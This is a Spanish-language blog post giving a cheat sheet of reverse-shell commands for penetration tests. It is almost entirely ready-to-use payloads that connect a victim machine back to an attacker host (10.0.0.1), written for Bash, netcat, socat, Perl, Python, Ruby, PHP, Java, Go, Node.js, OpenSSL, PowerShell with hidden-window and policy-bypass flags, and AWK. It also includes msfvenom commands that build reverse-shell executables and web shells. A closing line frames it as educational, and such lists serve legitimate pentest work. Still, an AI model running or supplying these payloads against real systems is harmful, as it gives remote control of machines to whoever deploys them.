Bienvenidos a un nuevo post en Byte Mind. En este caso vamos a dejar un listado de formas en las que obtener una reverse shell en la máquina víctima de nuestro test de penetración.
Dependiendo de la máquina objetivo podremos utilizar unas u otras en función de las herramientas o lenguajes instalados en la misma.
A continuación dejo la lista, espero que os sea de utilidad y recordad cambiar las direcciones y puertos por los correspondientes al objetivo actual.
Índice
Bash
# TCP # atacante nc -lvp 1234 # victima bash -i >& /dev/tcp/10.0.0.1/1234 0>&1 # UDP # atacante nc -u -lvp 1234 # victima sh -i >& /dev/udp/10.0.0.1/1234 0>&1 |
Netcat
# Reverse shell # atacante nc -lvp 1234 # victima nc -e /bin/sh 10.0.0.1 1234 # si la versión de netcat no soporta la opción -e utilizaremos el siguiente comando rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f # Bind shell # Una Bind shell se diferencia de la reverse en que la máquina víctima es quien escucha # atacante nc 10.10.10.2 1234 # victima nc -lvp 1234 -e /bin/sh |
Xterm
# atacante socat file:`tty`,raw,echo=0 TCP-L:1234 # victima /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234 |
Pueden descargar el binario estático de socat desde GitHub en el siguiente enlace
Perl
# atacante nc -lvp 1234 # victima perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' |
Python
# atacante nc -lvp 1234 # victima # IPv4 export RHOST="10.0.0.1";export RPORT=1234;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' # otra forma python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' # IPv6 python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",1234,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' # otra forma python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' # Sólo en windows C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 1234)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in 
[(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" |
Ruby
# atacante nc -lvp 1234 # victima ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' |
PHP
# atacante nc -lvp 1234 # victima php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' |
Java
# atacante nc -lvp 1234 # victima r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() |
Golang
# atacante nc -lvp 1234 # victima echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.0.0.1:1234");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go |
NodeJS
# atacante nc -lvp 1234 # victima (function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(1234, "10.0.0.1", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application form crashing })(); # otra forma require('child_process').exec('nc -e /bin/sh 10.0.0.1 1234') # otra forma -var x = global.process.mainModule.require -x('child_process').exec('nc 10.0.0.1 1234 -e /bin/bash') |
OpenSSL
# atacante openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 # otra forma ncat --ssl -vv -l -p 1234 # victima mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:1234 > /tmp/s; rm /tmp/s |
PowerShell
# atacante nc -lvp 1234 # victima (varios ejemplos) powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() # otra forma powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" |
AWK
# atacante nc -lvp 4242 # victima awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null |
Meterpreter shell
# En el framework Metasploit se incluye la herramienta MsfVenom que nos permite crear payloads en el lenguaje que necesitemos, algunos ejemplos: msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f exe > reverse.exe msfvenom -p windows/shell_reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f exe > reverse.exe msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f elf >reverse.elf msfvenom -p linux/x86/shell_reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f elf >reverse.elf msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f elf > shell.elf msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f exe > shell.exe msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f macho > shell.macho msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f asp > shell.asp msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f raw > shell.jsp msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f war > shell.war msfvenom -p cmd/unix/reverse_python LHOST="10.0.0.1" LPORT=1234 -f raw > shell.py msfvenom -p cmd/unix/reverse_bash LHOST="10.0.0.1" LPORT=1234 -f raw > shell.sh msfvenom -p cmd/unix/reverse_perl LHOST="10.0.0.1" LPORT=1234 -f raw > shell.pl msfvenom -p php/meterpreter_reverse_tcp LHOST="10.0.0.1" LPORT=1234 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php msfvenom -p cmd/unix/reverse_python LHOST="10.0.0.1" LPORT=1234 -f raw > shell.py |
Como siempre decimos, sólo mostramos esta información con fines educativos y para la realización de pentests de forma legal. No nos hacemos responsables de cualquier acción indebida realizada con ayuda de la misma.
Esto ha sido todo por el momento, espero les sea de utilidad y ya saben, cualquier duda o comentario, estamos a su disposición.